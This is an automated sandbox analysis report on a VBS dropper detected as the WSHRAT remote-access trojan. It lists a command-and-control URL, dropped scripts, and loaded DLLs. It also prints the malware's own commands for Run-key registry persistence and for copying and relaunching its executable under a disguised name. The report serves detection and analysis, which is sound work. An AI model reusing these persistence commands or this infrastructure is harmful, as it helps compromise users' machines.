                            Source: wscript.exe, 00000003.00000003.1683216538.000001E9CD33B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyaras
                            Source: wscript.exe, 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readybe.TARM~1
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readye
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyem32
                            Source: wscript.exe, 00000003.00000002.2596806001.000001E9CD34B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyl
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1683216538.000001E9CD33B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readys
                            Source: wscript.exe, 00000003.00000002.2596301073.000001E9CD1EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1683216538.000001E9CD33B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyt
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyzow.com:6892/is-readyP
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyzow.com:6892/is-readys
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                            Source: wscript.exe, 00000001.00000002.1345634293.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343866311.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343333967.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2596806001.000001E9CD392000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD39D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Yara detected WSHRAT
                            Source: Yara matchFile source: amsi64_8076.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_5872.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_480.amsi.csv, type: OTHER
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000003.00000002.2596806001.000001E9CD392000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1356330407.000001E9CB43A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596539768.000001F861CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1644848582.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000003.1564044312.000001F85FE1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640855197.000001B7E608A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1355744491.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2596806001.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1682858553.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640525306.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000003.1558907071.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596948186.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2597045534.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2595876491.000001E9CB221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1356488425.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640874613.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1645277445.000001B7E5E20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640631442.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000003.1564280890.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1645147466.000001B7E5D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 8076, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5872, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 480, type: MEMORYSTR

                            System Summary

                            barindex
                            Windows Scripting host queries suspicious COM object (likely to drop second stage)
                            Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                            Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                            Wscript called in batch mode (surpress errors)
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_024F84285_2_024F8428
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_024F4A485_2_024F4A48
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_024F75385_2_024F7538
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_024FBA485_2_024FBA48
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_024F58C85_2_024F58C8
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_024F7F785_2_024F7F78
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_024F4A3A5_2_024F4A3A
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_047315905_2_04731590
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_0473D41C5_2_0473D41C
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F44B685_2_07F44B68
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F44B595_2_07F44B59
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F4EA905_2_07F4EA90
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F506E05_2_07F506E0
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F54E805_2_07F54E80
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F5DDA05_2_07F5DDA0
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F5E5385_2_07F5E538
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F56B105_2_07F56B10
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F54E705_2_07F54E70
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F58B205_2_07F58B20
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F58B105_2_07F58B10
                            Source: ORDER-25013-67789543AX.vbsInitial sample: Strings found which are bigger than 50
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"
                            Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@28/10@1/3
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ggh[1].jsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\rHMh.jsJump to behavior
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs"
                            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: ORDER-25013-67789543AX.vbsVirustotal: Detection: 13%
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\DPGLXM.js"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\adobe.js"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\notepad.js"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\JaG.exe "C:\Users\user\AppData\Local\Temp\JaG.exe"
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.js"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 65
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 72 > nul && copy "C:\Users\user\AppData\Local\Temp\JaG.exe" "C:\Users\user\Audio\Windows Audio.exe" && ping 127.0.0.1 -n 72 > nul && "C:\Users\user\Audio\Windows Audio.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 72
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\DPGLXM.js" Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\adobe.js" Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\notepad.js" Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\JaG.exe "C:\Users\user\AppData\Local\Temp\JaG.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 72 > nul && copy "C:\Users\user\AppData\Local\Temp\JaG.exe" "C:\Users\user\Audio\Windows Audio.exe" && ping 127.0.0.1 -n 72 > nul && "C:\Users\user\Audio\Windows Audio.exe"Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 65
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 72
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
